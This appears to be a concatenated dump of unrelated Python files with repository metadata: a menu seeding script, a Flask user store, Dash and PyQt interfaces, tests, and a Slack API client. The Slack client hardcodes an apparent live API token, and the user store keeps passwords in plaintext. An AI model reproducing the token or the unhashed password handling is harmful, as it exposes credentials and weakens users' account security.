de mano, and possibly lechon. ", price="$7.99", course="Entree", \
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Taco Max", description="Big soft taco \
shell covered with Beef, cheese, and sides. ", price="$7.99", course=\
"Entree", restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Chips and Salsa", description="Chips \
and local made salsa. ", price="$3.99", course="Appetizer", restaurant=\
restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Fried Ice Cream", description="Balls of \
Ice Cream battered and fried. ", price="$3.99", course="Dessert", \
restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Soft Drink Bar", description="Variety of \
soft drinks ", price="$2.75", course="Beverage", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
restaurant1 = Restaurant(user_id=1, name="Stratos", address="2907 W Northwest \
Hwy, Dallas, TX", phone="857-234-1270", cuisine_cat="Greek", health_rating= \
"Good", picture = '/static/stratos.png')
session.add(restaurant1)
session.commit()
menuItem1 = MenuItem(user_id=1, name="Nick's Gyros", description="classic gyro \
freshly sliced off the rotisserie stuffed in a grilled Pita with homemade \
Tzatziki sauce, tomatoes and red onions, served with fries", price="$10.95", \
course="Entree", restaurant=restaurant1)
session.add(menuItem1)
session.commit
menuItem2 = MenuItem(user_id=1, name="Meat lovers Gyro Plate",
description="Double gyro meat atop a toasted Pita open-face with \
tomatoes, red onions, homemade Tzatziki sauce, sided with Feta cheese \
and Kalamata olives.", price="$13.95", course="Entree", \
restaurant=restaurant1)
session.add(menuItem2)
session.commit()
menuItem3 = MenuItem(user_id=1, name="Rack of Lamb",
description="Tender Australian lamb chops with oregano and grilled to \
savory perfection, seved with rice, fresh sauteed garden vegetables \
with pitta bread.", price="$13.95", course="Entree", \
restaurant=restaurant1)
session.add(menuItem3)
session.commit()
menuItem4 = MenuItem(user_id=1, name="Stratos",
description="beer battered and deep fried, sided with marinara and \
ranch", price="$6.25", course="Appetizer", restaurant=restaurant1)
session.add(menuItem4)
session.commit()
menuItem5 = MenuItem(user_id=1, name="Spanakopita",
description="Spinach, Feta cheese and onions baked in layers of flaky \
phyllo", price="$6.50", course="Appetizer", restaurant=restaurant1)
session.add(menuItem5)
session.commit()
menuItem6 = MenuItem(user_id=1, name="Aphrodite's Chocolate Passion", \
description="a sex bomb of a dessert -Dallas Morning News. A brownie crust \
filled with chocolate mousse cake with chunks of New York cheesecake and \
caramel erupting from the center crowned with almond slivers and chocolate \
curls, sided with a scoop of vanilla ice cream", price="$8.50", course=\
"Dessert", restaurant=restaurant1)
session.add(menuItem6)
session.commit()
menuItem7 = MenuItem(user_id=1, name="Fried Cheesecake",
description="New York cheesecake wrapped in flaky phyllo dough sheets \
and deep fried, rolled in sugar and cinnamo", price="$7.50", course=\
"Dessert", restaurant=restaurant1)
session.add(menuItem7)
session.commit()
menuItem8 = MenuItem(user_id=1, name="Red & White Wine List",
description="Large selection of wines for your drinking pleasure", \
price="$7.50", course="Beverage", restaurant=restaurant1)
session.add(menuItem8)
session.commit()
print "added menu items!"
| [
"tomakeitcount@gmail.com"
] | tomakeitcount@gmail.com |
b374fb8dd5c5ce3c6e5a407d2029560a72675aae | 8d5a9930ccca4631a6d049449fc6c6edc8847a9a | /FlaskWebProject1/FlaskWebProject1/Models/LocalDatabaseRoutines.py | fde153d77616b16c3d460a37a542bf536ebb230b | [] | no_license | JonathanLevy10/FlaskWebProject1 | ee43ee2bb78ffa32a30a650402e73c0e1f6cd6ef | f783c12afa57b1e65b80351246cf40ecb29cf92c | refs/heads/master | 2022-07-25T03:11:57.623536 | 2020-05-14T18:16:48 | 2020-05-14T18:16:48 | 259,357,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,383 | py | from os import path
import json
import pandas as pd
def create_LocalDatabaseServiceRoutines():
return LocalDatabaseServiceRoutines()
class LocalDatabaseServiceRoutines(object):
def __init__(self):
self.name = 'Database cron jobs'
self.index = {}
print(path.dirname(__file__))
self.UsersDataFile = path.join(path.dirname(__file__), '..\\static\\Data\\users.csv')
# -------------------------------------------------------
# Read users data into a dataframe
# -------------------------------------------------------
def ReadCSVUsersDB(self):
df = pd.read_csv(self.UsersDataFile)
return df
# -------------------------------------------------------
# Saves the DataFrame (input parameter) into the users csv
# -------------------------------------------------------
def WriteCSVToFile_users(self, df):
df.to_csv(self.UsersDataFile, index=False)
# -------------------------------------------------------
# Check if username is in the data file
# -------------------------------------------------------
def IsUserExist(self, UserName):
# Load the database of users
df = self.ReadCSVUsersDB()
df = df.set_index('username')
return (UserName in df.index.values)
# -------------------------------------------------------
# return boolean if username/password pair is in the DB
# -------------------------------------------------------
def IsLoginGood(self, UserName, Password):
# Load the database of users
df = self.ReadCSVUsersDB()
df=df.reset_index()
selection = [UserName]
df = df[pd.DataFrame(df.username.tolist()).isin(selection).any(1)]
df = df.set_index('password')
return (Password in df.index.values)
# -------------------------------------------------------
# Add a new user to the DB
# -------------------------------------------------------
def AddNewUser(self, User):
# Load the database of users
df = self.ReadCSVUsersDB()
dfNew = pd.DataFrame([[User.firstname.data, User.lastname.data, User.phonenumber.data, User.emailaddress.data, User.username.data, User.password.data]], columns=['firstname', 'lastname', 'phonenumber', 'emailaddress', 'username', 'password'])
dfComplete = df.append(dfNew, ignore_index=True)
self.WriteCSVToFile_users(dfComplete)
| [
"jonathanlevy100@gmail.com"
] | jonathanlevy100@gmail.com |
97d8869524ef83d60dca7a4088e49759caefe61f | 0c072d8e09b6affefacd7f551539161836be68a0 | /app.py | b8c64f6cead3cee4d38a88043ecfe626c40a724c | [] | no_license | AlexandrDemin/python-selenium-parser | a21a1b09483d6de4f053ea5c35794f82d4cc7328 | 08d3abe8f1258c162c990d0241280cd9f5ae01f8 | refs/heads/master | 2020-07-26T08:16:40.015962 | 2019-09-15T12:07:04 | 2019-09-15T12:07:04 | 208,587,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,712 | py | from logic import *
# Очистка логов, чтобы не разрастались
discardOldLogs(10000)
# Чтение конфигов
parsers_config, subscriptions_config = readConfigs('./parsers-config.json', './subscriptions-config.json')
writeLog({
'time': datetime.now().strftime(getDateFormat(True)),
'message': "Старт"
})
# Запускаем Хром
driver = webdriver.Chrome()
# Перебор подписок, парсинг сайтов и рассылка писем
for user in subscriptions_config:
for subscription in user['subscriptions']:
try:
website = subscription['website']
parser_config = parsers_config[website]
fltr = subscription['filter']
data = parseSite(website, parser_config, fltr, driver, subscription)
writeLog({
'time': datetime.now().strftime(getDateFormat(True)),
'message': f"Спарсили {len(data)} элементов по подписке {subscription['name']}"
})
if len(data):
html_content = generateHtml(data, subscription, parser_config.get("values").get("TYPES"), user['guid'])
sendEmail(user['email'], subscription['name'], html_content)
except Exception as e:
writeLog({
'time': datetime.now().strftime(getDateFormat(True)),
'error': f'Ошибка при обработке подписки {subscription["name"]}',
'stackTrace': str(e)
}, True)
# Выключаем хром
driver.quit()
writeLog({
'time': datetime.now().strftime(getDateFormat(True)),
'message': f"Финиш"
})
| [
"hseoanalytics@gmail.com"
] | hseoanalytics@gmail.com |
2e649e38f08b2d73a928df18881ff569ea42cb6e | 59061e3699f3a181cba344360ed3cf89db88763b | /sandbox/uTools/dash/data_viewer.py | ad7aa813976ea8ddf3299c490a8cf27d30d50f83 | [
"MIT"
] | permissive | giecli/unifloc | 4a4bb8cd0b37d5905eab5a367e6b5ccb324d4df8 | f1b97e144a0292d43e341cd3b3552ee8fd8713eb | refs/heads/master | 2022-06-27T10:40:47.821344 | 2020-05-11T16:47:20 | 2020-05-11T16:47:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,314 | py | """
Веб-просмотрщик графиков. Открывается в браузере. Для построения графиков датафреймов по временному индексу.
Считывает все файлы .csv которые лежат в dir_path и строит графики всех колонок от временного индекса.
Можно добавить до 6 графиков.
К каждому графику идут 2 элемента управления:
- 1-ый отвечает за выбор файлов для графика
- 2-ый отвечает за выбор колонок. Список колонок уникальный из всех файлов.
Поэтому если для конкретного файла выбранной колонки нет, то график не построится.
Код универсален и может быть использован для любого проекта,
нужно только поменять директорию для считывания файлов - переменная dir_path
10/01/2020
А.Водопьян
O.Koбзарь
"""
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import plotly.graph_objs as go
from plotly.subplots import make_subplots
import pandas as pd
from glob import glob
# Служебные переменные, можно менять настройки перед запуском
ver = '0.2.1'
date = '01/2020'
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
graph_mode = 'lines+markers' # 'markers', 'lines', 'lines+markers'
dir_path = 'input/'
# Считывание файлов
file_paths = glob(dir_path + '*.csv')
file_names = [file_path[len(dir_path):] for file_path in file_paths]
files = {}
for file_name, file_path in zip(file_names, file_paths):
files.update({file_name: pd.read_csv(file_path, index_col=0)})
all_cols = list(files[file_names[0]].columns)
for i in range(1, len(file_names)):
all_cols += list(files[file_names[i]].columns)
unique_cols = list(set(all_cols))
# Функции для построения графиков
def make_sub(dfs, df_keys, params):
traces = []
for key, df in zip(df_keys, dfs):
for par in params:
if par in df.columns:
this_df = df.dropna(subset = [par])
if this_df.shape[0] > 0:
traces.append(go.Scattergl(x=this_df.index, y=this_df[par], name=key + ', ' + par, mode=graph_mode,
marker=dict(size=5)))
else:
pass
return traces
def plot_ex(list_dfs, list_df_keys, list_params, height):
fig = make_subplots(rows=len(list_dfs), shared_xaxes=True, vertical_spacing=0.02)
for j in range(1, len(list_dfs)+1):
traces = make_sub(list_dfs[j-1], list_df_keys[j-1], list_params[j-1])
for trace in traces:
fig.append_trace(trace, row=j, col=1)
fig.update_layout(height=height)
#fig.update_yaxes(dtick=1)
return fig
# Код приложения
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div(children=[html.Div([html.H4('Просмотрщик графиков'),
html.P('Версия %s. %s' % (ver, date)),
html.P('Водопьян А.О., Кобзарь О.С.')],
style={'width': '20%', 'display': 'inline-block'}),
html.Div([html.H4('Создайте от 2 до 6 графиков'),
html.P('Выберите файл/файлы для каждого графика'),
html.P('Выберите параметр/параметры для каждого графика')],
style={'width': '20%', 'display': 'inline-block'}),
html.Div([html.Button(id='add-graph-button', n_clicks=0, children='Добавить график')],
style={'display': 'inline-block'}),
html.Div([
html.P('Управление графиком 1', id='text-1'),
dcc.Dropdown(
id='loaded_files_dict-subplot-1',
options=[{'label': i, 'value': i} for i in file_names],
value=[file_names[0]],
multi=True),
dcc.Dropdown(
id='cols-subplot-1',
options=[{'label': i, 'value': i} for i in unique_cols],
value=[unique_cols[0]],
multi=True)], id='management-1'),
html.Div([
html.P('Управление графиком 2', id='text-2'),
dcc.Dropdown(
id='loaded_files_dict-subplot-2',
options=[{'label': i, 'value': i} for i in file_names],
value=[file_names[0]],
multi=True),
dcc.Dropdown(
id='cols-subplot-2',
options=[{'label': i, 'value': i} for i in unique_cols],
value=[unique_cols[0]],
multi=True)], id='management-2'),
html.Div([
html.P('Управление графиком 3', id='text-3'),
dcc.Dropdown(
id='loaded_files_dict-subplot-3',
options=[{'label': i, 'value': i} for i in file_names],
value=[file_names[0]],
multi=True),
dcc.Dropdown(
id='cols-subplot-3',
options=[{'label': i, 'value': i} for i in unique_cols],
value=[unique_cols[0]],
multi=True)], id='management-3', style={'display': 'none'}),
html.Div([
html.P('Управление графиком 4', id='text-4'),
dcc.Dropdown(
id='loaded_files_dict-subplot-4',
options=[{'label': i, 'value': i} for i in file_names],
value=[file_names[0]],
multi=True),
dcc.Dropdown(
id='cols-subplot-4',
options=[{'label': i, 'value': i} for i in unique_cols],
value=[unique_cols[0]],
multi=True)], id='management-4', style={'display': 'none'}),
html.Div([
html.P('Управление графиком 5', id='text-5'),
dcc.Dropdown(
id='loaded_files_dict-subplot-5',
options=[{'label': i, 'value': i} for i in file_names],
value=[file_names[0]],
multi=True),
dcc.Dropdown(
id='cols-subplot-5',
options=[{'label': i, 'value': i} for i in unique_cols],
value=[unique_cols[0]],
multi=True)], id='management-5', style={'display': 'none'}),
html.Div([
html.P('Управление графиком 6', id='text-6'),
dcc.Dropdown(
id='loaded_files_dict-subplot-6',
options=[{'label': i, 'value': i} for i in file_names],
value=[file_names[0]],
multi=True),
dcc.Dropdown(
id='cols-subplot-6',
options=[{'label': i, 'value': i} for i in unique_cols],
value=[unique_cols[0]],
multi=True)], id='management-6', style={'display': 'none'}),
html.Div([
dcc.Graph(
id='plot',
figure=plot_ex([[files[file_names[0]]], [files[file_names[0]]]],
[[file_names[0]], [file_names[0]]],
[[files[file_names[0]].columns[0]],
[files[file_names[0]].columns[0]]], 600)
)])
], id='main')
@app.callback(Output('plot', 'figure'),
[Input('loaded_files_dict-subplot-1', 'value'),
Input('cols-subplot-1', 'value'),
Input('loaded_files_dict-subplot-2', 'value'),
Input('cols-subplot-2', 'value'),
Input('loaded_files_dict-subplot-3', 'value'),
Input('cols-subplot-3', 'value'),
Input('loaded_files_dict-subplot-4', 'value'),
Input('cols-subplot-4', 'value'),
Input('loaded_files_dict-subplot-5', 'value'),
Input('cols-subplot-5', 'value'),
Input('loaded_files_dict-subplot-6', 'value'),
Input('cols-subplot-6', 'value')],
[State('add-graph-button', 'n_clicks')])
def update_graph(file_vals1, col_vals1, file_vals2, col_vals2, file_vals3, col_vals3, file_vals4, col_vals4,
file_vals5, col_vals5, file_vals6, col_vals6, n_clicks):
files_plot1 = [files[val] for val in file_vals1]
files_plot2 = [files[val] for val in file_vals2]
files_plot = [files_plot1, files_plot2]
files_vals = [file_vals1, file_vals2]
col_vals = [col_vals1, col_vals2]
height = 600
if 0 < n_clicks:
files_plot3 = [files[val] for val in file_vals3]
files_plot.append(files_plot3)
files_vals.append(file_vals3)
col_vals.append(col_vals3)
height += 200
if 1 < n_clicks:
files_plot4 = [files[val] for val in file_vals4]
files_plot.append(files_plot4)
files_vals.append(file_vals4)
col_vals.append(col_vals4)
height += 200
if 2 < n_clicks:
files_plot5 = [files[val] for val in file_vals5]
files_plot.append(files_plot5)
files_vals.append(file_vals5)
col_vals.append(col_vals5)
height += 200
if 3 < n_clicks:
files_plot6 = [files[val] for val in file_vals6]
files_plot.append(files_plot6)
files_vals.append(file_vals6)
col_vals.append(col_vals6)
height += 200
return plot_ex(files_plot, files_vals, col_vals, height)
@app.callback(Output('management-3', 'style'),
[Input('add-graph-button', 'n_clicks')])
def update_management_3(n_clicks):
if 0 < n_clicks < 2:
return {'display': 'inline'}
else:
raise PreventUpdate
@app.callback(Output('management-4', 'style'),
[Input('add-graph-button', 'n_clicks')])
def update_management_4(n_clicks):
if 1 < n_clicks < 3:
return {'display': 'inline'}
else:
raise PreventUpdate
@app.callback(Output('management-5', 'style'),
[Input('add-graph-button', 'n_clicks')])
def update_management_5(n_clicks):
if 2 < n_clicks < 4:
return {'display': 'inline'}
else:
raise PreventUpdate
@app.callback(Output('management-6', 'style'),
[Input('add-graph-button', 'n_clicks')])
def update_management_6(n_clicks):
if 3 < n_clicks < 5:
return {'display': 'inline'}
else:
raise PreventUpdate
if __name__ == '__main__':
app.run_server()
| [
"oleg.kobzarius@gmail.com"
] | oleg.kobzarius@gmail.com |
5764a65bdcda6024e0ed844fb8b8f999255b8dc7 | b43103229a5fc3c49285818881eea7c42b8021c2 | /YouTube/untitled.py | 0f980ba263b37c670de858c3ac23326e6f6d2be4 | [] | no_license | AlienWu2019/Alien-s-Code | 34eaf60ae7ada4810c3564cee1a25371c1c3f7ad | 983f68d13a81e6141779d26c84e371b2bf1d2e0d | refs/heads/master | 2020-05-07T18:42:03.723993 | 2019-05-05T14:32:49 | 2019-05-05T14:32:49 | 180,777,724 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,315 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'untitled.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(601, 124)
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(30, 20, 91, 16))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(30, 70, 72, 15))
self.label_2.setObjectName("label_2")
self.lineEdit = QtWidgets.QLineEdit(Form)
self.lineEdit.setGeometry(QtCore.QRect(130, 10, 331, 31))
self.lineEdit.setObjectName("lineEdit")
self.textBrowser = QtWidgets.QTextBrowser(Form)
self.textBrowser.setGeometry(QtCore.QRect(130, 60, 331, 31))
self.textBrowser.setObjectName("textBrowser")
self.pushButton = QtWidgets.QPushButton(Form)
self.pushButton.setGeometry(QtCore.QRect(490, 10, 93, 28))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Form)
self.pushButton_2.setGeometry(QtCore.QRect(490, 60, 93, 28))
self.pushButton_2.setObjectName("pushButton_2")
self.retranslateUi(Form)
self.lineEdit.windowIconTextChanged['QString'].connect(self.pushButton.click)
self.pushButton.clicked.connect(Form.show)
self.pushButton_2.clicked.connect(self.lineEdit.show)
self.pushButton_2.clicked.connect(self.textBrowser.show)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.label.setText(_translate("Form", "输入视频url:"))
self.label_2.setText(_translate("Form", "状态:"))
self.pushButton.setText(_translate("Form", "确定"))
self.pushButton_2.setText(_translate("Form", "清空"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
widget = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(widget)
widget.show()
sys.exit(app.exec_()) | [
"q582946945@gmail.com"
] | q582946945@gmail.com |
bd68f8041117d92eb553df754224acbd6b160e37 | a4440a990b86a239a30b4295661ca588db3f5928 | /venv/bin/pip2.7 | b11f3cf45970c225a164150b0c3ba31a8c289eb2 | [] | no_license | YangXinNewlife/MachineLearning | fdaa1f75b90c143165d457b645d3c13fee7ea9a1 | 196ebdc881b74c746f63768b7ba31fec65e462d5 | refs/heads/master | 2020-04-05T00:10:25.050507 | 2019-06-10T03:44:33 | 2019-06-10T03:44:33 | 156,386,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | 7 | #!/Users/yangxin_ryan/PycharmProjects/MachineLearning/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"yangxin03@youxin.com"
] | yangxin03@youxin.com |
1e7d4503de1ff9096dd99d0ae21546a1e45e192d | ed6618caf0ab52e468a490b9541cd62d72baeef9 | /tests/ArgumentPassingTests.py | 76709382d6ea18bebdc3212ab0cce21bf60712ea | [
"Unlicense"
] | permissive | threadly/python-threadly | 3b51bc1a38a579f137c82cfad97c45c1dc5ca3a6 | b0620d474c5d349fa75f2915fbe3035a9523225b | refs/heads/master | 2021-01-17T17:22:59.069830 | 2019-08-20T19:49:57 | 2019-08-20T19:49:57 | 18,851,014 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | import threadly, time, random
import unittest
class TestAugumentParsing(unittest.TestCase):
def arguments(self, arg1, key=None):
self.assertNotEqual(arg1, None)
self.assertNotEqual(key, None)
self.arg1 = arg1
self.keys = {"key":key}
def test_keyTestExecute(self):
self.arg1 = None
self.keys = {}
sch = threadly.Scheduler(10)
sch.execute(self.arguments, args=("test", ), kwargs={"key":"test"})
time.sleep(.1)
self.assertEqual(self.arg1, "test")
self.assertEqual(self.keys["key"], "test")
sch.shutdown().get()
def test_keyTestSchedule(self):
self.arg1 = None
self.keys = {}
sch = threadly.Scheduler(10)
sch.schedule(self.arguments, recurring=True, delay=10, args=("test", ), kwargs={"key":"test"}, key="TEST")
time.sleep(.1)
self.assertEqual(self.arg1, "test")
self.assertEqual(self.keys["key"], "test")
sch.shutdown().get()
if __name__ == '__main__':
unittest.main()
| [
"lwahlmeier@gmail.com"
] | lwahlmeier@gmail.com |
8fb8a742cc9a4cd0b6f9757c2cf563844e3b7dba | 63082cd1d0b9bb7e5dc8aca40e447a207f91ff6a | /tests/test_login.py | d5893c578eaaf7abc0628261e8d792951939ca29 | [
"MIT"
] | permissive | MPEDS/mpeds-coder | ec8ab42d874b1104082b26ca4158c8304ed0b189 | 5fb22ef3fd9e45d5f17a20d436f4813b6c63dd0c | refs/heads/master | 2022-09-30T23:41:32.876632 | 2022-09-15T20:57:37 | 2022-09-15T20:57:37 | 51,221,179 | 19 | 3 | MIT | 2021-08-30T20:46:51 | 2016-02-06T20:47:04 | Python | UTF-8 | Python | false | false | 1,327 | py | import csv
import unittest
from selenium.webdriver import Firefox, FirefoxOptions
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
class LoginTest(unittest.TestCase):
opts = FirefoxOptions()
opts.add_argument("--headless")
driver = Firefox(options=opts)
def setUp(self):
users = {}
with open('credentials.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
users[row[0]] = row[1]
print("Navigating to homepage...")
self.driver.get("http://cliff.ssc.wisc.edu/campus_protest_dev/adj")
print("Logging in...")
self.driver.find_element(By.NAME, 'username').send_keys('adj1')
self.driver.find_element(By.NAME, 'password').send_keys(users['adj1'])
self.driver.find_element(By.NAME, 'login').send_keys(Keys.ENTER)
def tearDown(self):
self.driver.quit()
## Tests
def test_login(self):
el = WebDriverWait(driver = self.driver, timeout = 10).\
until(lambda d: d.find_element_by_link_text("Adjudication Interface"))
self.assertEqual(el.text, "Adjudication Interface")
if __name__ == "__main__":
unittest.main() | [
"alex.hanna@gmail.com"
] | alex.hanna@gmail.com |
63cde813e382083838bf95c063efdad27061a475 | 821f403a3afc9055d40893eca033c369a4c3831e | /Medium/No106i.py | 7aea7f5abcf3edf0b212fbd8f021e53b5dee52af | [] | no_license | kikihiter/LeetCode2 | 29f91b6992a01ba23e7da04b2b2c862410cc563b | 7167f1a7c6cb16cca63675c80037682752ee2a7d | refs/heads/master | 2023-05-01T03:45:44.482932 | 2021-05-19T13:12:16 | 2021-05-19T13:12:16 | 277,283,525 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def buildTree(self, inorder, postorder):
"""
:type inorder: List[int]
:type postorder: List[int]
:rtype: TreeNode
"""
if not inorder:
return None
if len(inorder) == len(postorder) == 1:
return TreeNode(postorder[-1])
nodeVal = postorder[-1]
i = inorder.index(nodeVal)
root = TreeNode(nodeVal)
if i > 0 :
root.left = self.buildTree(inorder[:i], postorder[:i])
if i < len(postorder)-1:
root.right = self.buildTree(inorder[i+1:], postorder[i:-1])
return root | [
"noreply@github.com"
] | kikihiter.noreply@github.com |
f3a6a0ba64b51db85a8cfef0164e1771578398eb | c91e96406016aa36aea19184ac1a18e5b35dac90 | /api/slack.py | efcc173acfed2c164b9fe2a54d986c226882ff2e | [] | no_license | pdelkowski/pyslacker | dc0c34ed353357eff7abe86978ce5b2e5b620c23 | bd33eec683d6b1483c9355be5ea4a188d2670fb6 | refs/heads/master | 2021-01-20T19:34:42.499805 | 2016-08-22T17:21:55 | 2016-08-22T17:21:55 | 62,735,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,143 | py | import websocket
import thread
import threading
import requests
import json
from utils.logger import AppLogger
from models.user import UserManager
from models.room import RoomManager
from models.message import MessageManager, Message
from models.exception import UserNotFoundError
class SlackApi:
GET = 'get'
POST = 'post'
def __init__(self, ui, users_table, chat_queue, token=None):
self.logger = AppLogger.get_logger()
self.UI = ui
self._token = 'xoxp-4098964602-4096552845-19491432598-2b27154c5c'
self._chat_queue = chat_queue
init_data = self._get_ws_basic_data()
ws_url = self._get_ws_url(init_data)
self.users = self._get_init_users(init_data)
self._channels = self._get_init_channels(init_data)
self._groups = self._get_init_groups(init_data)
self._profile = self._get_init_profile(init_data)
# Processing initial data
self._process_init_users(init_data)
self._process_init_channels(init_data)
self._process_init_groups(init_data)
self.logger.info("$$$ INTIAL DATA")
self.logger.info(init_data)
self.logger.info(self.users)
self.logger.info(self._channels)
self.logger.info(self._profile)
# ADDING USERS !!!
# self.UI.USERS.add_many(self.users)
users_table.add_many(self.users)
self._ws = websocket.WebSocketApp(ws_url,
on_message=self._api_on_message,
on_error=self._api_on_error,
on_close=self._api_on_close)
self._ws.on_open = self._api_on_open
self.logger.debug("="*160)
self.logger.debug("PRE thread start")
self._ws_thread = threading.Thread(target=self._ws.run_forever)
self._ws_thread.start()
self.logger.debug("POST thread start")
# self._ws.run_forever()
def _request(self, met, url, params=None):
req_params = None
if params is not None:
req_params = '&'.join(['{}={}'.format(k, v)
for k, v in params.iteritems()])
if met == 'get':
r = requests.get(url, req_params)
if met == 'post':
r = requests.post(url, req_params)
self.logger.debug("REQUEST: "+url+" PARAMS: "+str(req_params))
response_log = str(r.json())
self.logger.debug("RESPONSE: "+response_log)
return r
def _get_ws_basic_data(self):
url = 'https://slack.com/api/rtm.start?token='+self._token
# r = requests.get(url)
r = self._request(self.GET, url)
if r.status_code != 200:
raise Exception("Could not connect to Slack HTTP API")
return r.json()
def _get_ws_url(self, data):
return data['url']
def _process_init_channels(self, data):
chnls = data['channels']
for channel in chnls:
chnl_id = channel['id']
chnl_name = channel['name']
chnl_type = 'channel'
RoomManager.add_room(chnl_type, chnl_id, chnl_name)
def _get_init_channels(self, data):
chnls = data['channels']
channels = []
for channel in chnls:
c_dict = {'name': channel['name'], 'id': channel['id'],
'type': 'channel'}
channels.append(c_dict)
return channels
def _process_init_groups(self, data):
chnls = data['groups']
for channel in chnls:
chnl_id = channel['id']
chnl_name = channel['name']
chnl_type = 'group'
RoomManager.add_room(chnl_type, chnl_id, chnl_name)
def _get_init_groups(self, data):
chnls = data['groups']
groups = []
for channel in chnls:
c_dict = {'name': channel['name'], 'id': channel['id'],
'type': 'group'}
groups.append(c_dict)
return groups
def _process_init_users(self, data):
usrs = data['users']
for user in usrs:
user_id = user['id']
user_name = user['name']
user_real_name = user['profile']['real_name_normalized']
UserManager.add_user(user_id, user_name, user_real_name, None)
def _get_init_users(self, data):
usrs = data['users']
users = []
for user in usrs:
u_dict = {'name': user['name'],
'full_name': user['profile']['real_name_normalized'],
'presence': user['presence'], 'id': user['id']}
users.append(u_dict)
return users
def _get_init_profile(self, data):
profile = {'name': data['self']['name'], 'id': data['self']['id']}
return profile
def _api_on_message(self, ws, message):
self.logger.info('INCOMING MESSAGE')
self.logger.info(str(message))
msg_obj = json.loads(message)
if msg_obj['type'] == 'message':
chnl = msg_obj['channel']
if 'user' in msg_obj:
user_id = msg_obj['user']
elif 'bot_id' in msg_obj:
user_id = msg_obj['bot_id']
else:
raise UserNotFoundError("Could't find user id")
user = UserManager.find(user_id)
if user is None:
user = UserManager.create(user_id, msg_obj['username'])
self.logger.info("New message hook")
msg = Message(chnl, msg_obj['text'], user_id, msg_obj['ts'])
self._chat_queue.append_msgs(msg)
else:
self.logger.info("Unknown hook")
# print '%%%%%%%%%%%% MESSAGE %%%%%%%%%%%%'
# print message
def _api_on_error(self, ws, error):
print '%%%%%%%%%%%% ERROR %%%%%%%%%%%%'
print error
def _api_on_close(self, ws):
print "### closed ###"
def _api_on_open(self, ws):
self.UI.change_status('Connected')
def run(*args):
self.UI.change_status('Connected')
# j = send_dummy_msg(channels[0]['id'])
# ws.send(j.encode('utf-8'))
# for i in range(3):
# time.sleep(1)
# # ws.send("Hello %d" % i)
# time.sleep(1)
# ws.close()
# print "thread terminating..."
thread.start_new_thread(run, ())
def _retrieve_identity(self):
url_base = "https://slack.com/api/"
url_action = 'auth.test?'
url_token = "token=" + str(self._token)
url = url_base + url_action + url_token
r = self._request(self.GET, url)
if r.status_code != 200:
raise Exception("Could not connect to Slack HTTP API")
self.logger.info("REQUEST RESPONSE: auth.test" + str(r.json()))
return r.json()
def get_identity(self):
if hasattr(self, '_identity') is False:
self._identity = self._retrieve_identity()
return self._identity
def get_rooms(self):
return self._channels
def get_groups(self):
return self._groups
def get_messages(self, room, count=200):
url_base = "https://slack.com/api/"
if room.room_type == 'channel':
url_action = 'channels.history?'
elif room.room_type == 'group':
url_action = 'groups.history?'
else:
raise NameError('Cannot retrieve messages of unknown type')
url_token = "token=" + str(self._token)
url_channel = "&channel=" + str(room.hash_id) + "&count=" + str(count)
url = url_base + url_action + url_token + url_channel
r = self._request(self.GET, url)
if r.status_code != 200:
raise Exception("Could not connect to Slack HTTP API")
self.logger.info("REQUEST RESPONSE: channels.history" + str(r.json()))
msgs = []
room_id = room.hash_id
for obj in r.json()['messages']:
self.logger.info("abcdef" + str(obj))
if 'user' in obj:
user_id = obj['user']
elif 'bot_id' in obj:
user_id = obj['bot_id']
if UserManager.find(user_id) is None:
UserManager.add_user(user_id, obj['username'])
else:
raise UserNotFoundError("Unknown type of user")
msg = Message(room_id, obj['text'], user_id, obj['ts'])
msgs.append(msg)
return msgs # r.json()
def send_message(self, message):
url_base = "https://slack.com/api/"
url_action = 'chat.postMessage?'
url_token = "token=" + str(self._token)
url_channel = "&channel=" + str(message.room.hash_id) + "&text=" + str(message.text)
url = url_base + url_action + url_token + url_channel
self.logger.info("SEND MSG REQUEST " + str(url))
r = self._request(self.GET, url)
if r.status_code != 200:
raise Exception("Could not connect to Slack HTTP API")
